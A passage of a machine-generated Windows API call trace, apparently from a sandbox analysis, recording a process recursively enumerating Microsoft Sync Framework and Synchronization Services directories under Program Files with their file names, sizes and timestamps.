ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0058.269] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.270] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.270] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="License Agreements", cAlternateFileName="LICENS~1")) returned 1 [0058.270] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.270] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.270] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb2b9400, ftCreationTime.dwHighDateTime=0x1c9c55a, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb2b9400, ftLastWriteTime.dwHighDateTime=0x1c9c55a, nFileSizeHigh=0x0, nFileSizeLow=0x1afd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SynchronizationEula.rtf", cAlternateFileName="SYNCHR~1.RTF")) returned 1 [0058.270] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb2b9400, ftCreationTime.dwHighDateTime=0x1c9c55a, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb2b9400, ftLastWriteTime.dwHighDateTime=0x1c9c55a, nFileSizeHigh=0x0, nFileSizeLow=0x1afd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SynchronizationEula.rtf", cAlternateFileName="SYNCHR~1.RTF")) returned 0 [0058.270] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.270] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="License Agreements", cAlternateFileName="LICENS~1")) returned 0 [0058.271] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.271] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0058.271] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.271] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 1 [0058.271] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.271] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.271] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0058.271] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.274] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.274] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67cf6a00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67cf6a00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x38770, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedSync.dll", cAlternateFileName="")) returned 1 [0058.274] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c136700, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c136700, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x33760, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0058.274] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="resources", cAlternateFileName="RESOUR~1")) returned 1 [0058.274] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.275] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.275] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0058.276] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.276] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.276] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f772f00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f772f00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x3170, dwReserved0=0x0, dwReserved1=0x0, cFileName="Synchronization.rll", cAlternateFileName="SYNCHR~1.RLL")) returned 1 [0058.276] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f772f00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f772f00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x3170, dwReserved0=0x0, dwReserved1=0x0, cFileName="Synchronization.rll", cAlternateFileName="SYNCHR~1.RLL")) returned 0 [0058.276] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.276] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0058.276] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.276] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67cf6a00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67cf6a00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x6db60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Synchronization.dll", cAlternateFileName="SYNCHR~1.DLL")) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67cf6a00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67cf6a00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x6db60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Synchronization.dll", cAlternateFileName="SYNCHR~1.DLL")) returned 0 [0058.277] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0058.277] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 0 [0058.277] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0058.277] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe1796f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1796f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0058.278] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe1796f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1796f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.278] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe1796f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1796f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.278] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADO.NET", cAlternateFileName="")) returned 1 [0058.278] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.278] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.278] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0058.279] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.283] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.283] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b72c500, ftCreationTime.dwHighDateTime=0x1c8bd0c, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b72c500, ftLastWriteTime.dwHighDateTime=0x1c8bd0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c420, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0058.283] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b72c500, ftCreationTime.dwHighDateTime=0x1c8bd0c, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b72c500, ftLastWriteTime.dwHighDateTime=0x1c8bd0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c420, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.Server.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74481500, ftCreationTime.dwHighDateTime=0x1c8d683, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74481500, ftLastWriteTime.dwHighDateTime=0x1c8d683, nFileSizeHigh=0x0, nFileSizeLow=0x17450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.SqlServerCe.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74481500, ftCreationTime.dwHighDateTime=0x1c8d683, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74481500, ftLastWriteTime.dwHighDateTime=0x1c8d683, nFileSizeHigh=0x0, nFileSizeLow=0x17450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.SqlServerCe.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0058.284] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.285] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, 